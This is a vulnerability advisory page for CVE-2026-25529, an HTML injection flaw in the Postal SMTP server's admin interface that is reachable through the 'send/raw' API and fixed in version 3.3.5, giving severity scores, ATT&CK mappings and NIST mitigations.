CVE-2026-25529
Published: 12 March 2026
Summary
CVE-2026-25529 is a high-severity Cross-site Scripting (CWE-79) vulnerability in Postalserver Postal. Its CVSS base score is 8.1 (High).
Operationally, exploitation aligns with the MITRE ATT&CK technique Exploitation for Privilege Escalation (T1068); ranked at the 14.1th percentile by exploit likelihood (below the median); it is not currently listed in the CISA KEV catalog.
The strongest mitigations our analysis identified are NIST 800-53 SI-10 (Information Input Validation) and SI-15 (Information Output Filtering).
Deeper analysis
CVE-2026-25529 is an HTML injection vulnerability (CWE-79) affecting Postal, an open source SMTP server, in versions prior to 3.3.5. The flaw allows unescaped data to be injected into the admin interface, primarily through the API's "send/raw" method. This enables arbitrary HTML insertion, which could alter the page's appearance in a misleading manner or facilitate unauthorized JavaScript execution. The vulnerability carries a CVSS v3.1 base score of 8.1 (AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N), indicating high severity due to network accessibility, low attack complexity, and significant impacts on confidentiality and integrity.
An attacker with low privileges, such as an authenticated user with access to the "send/raw" API endpoint, can exploit this over the network without user interaction. Successful exploitation injects malicious HTML or JavaScript into the admin interface, potentially leading to cross-site scripting (XSS) attacks that steal session cookies, impersonate administrators, or manipulate interface elements to deceive users.
The official GitHub Security Advisory (GHSA-5f4r-5jpr-rfhc) confirms the issue was fixed in Postal version 3.3.5 and later, recommending immediate upgrades for affected installations. No additional workarounds are specified beyond applying the patch.
OWASP Top 10 for Web (2025)
EU & UK References
- 🇪🇺 ENISA EUVD: EUVD-2026-11603
Vulnerability details
Postal is an open source SMTP server. Postal versions less than 3.3.5 had a HTML injection vulnerability that allowed unescaped data to be included in the admin interface. The primary way for unescaped data to be added is via the…
more
API's "send/raw" method. This could allow arbitrary HTML to be injected in to the page which may modify the page in a misleading way or allow for unauthorised javascript to be executed. Fixed in 3.3.5 and higher.
- CWE(s)
Related Threats
MITRE ATT&CK Enterprise TechniquesAI
Why these techniques?
Stored XSS via HTML/JS injection in admin interface directly enables browser session hijacking, web session cookie theft for credential access, and subsequent privilege escalation/impersonation of admins.
CVEs Like This One
Affected Assets
Mitigating Controls
Mitigating Controls (NIST 800-53 r5) AI
Information Output Filtering directly prevents HTML injection by encoding or sanitizing unescaped data before rendering in the admin interface.
Information Input Validation enforces sanitization or rejection of malicious HTML/JS in API inputs like send/raw to block injection at the source.
Flaw Remediation requires timely patching of vulnerabilities like CVE-2026-25529, as fixed in Postal 3.3.5, to eliminate the injection flaw.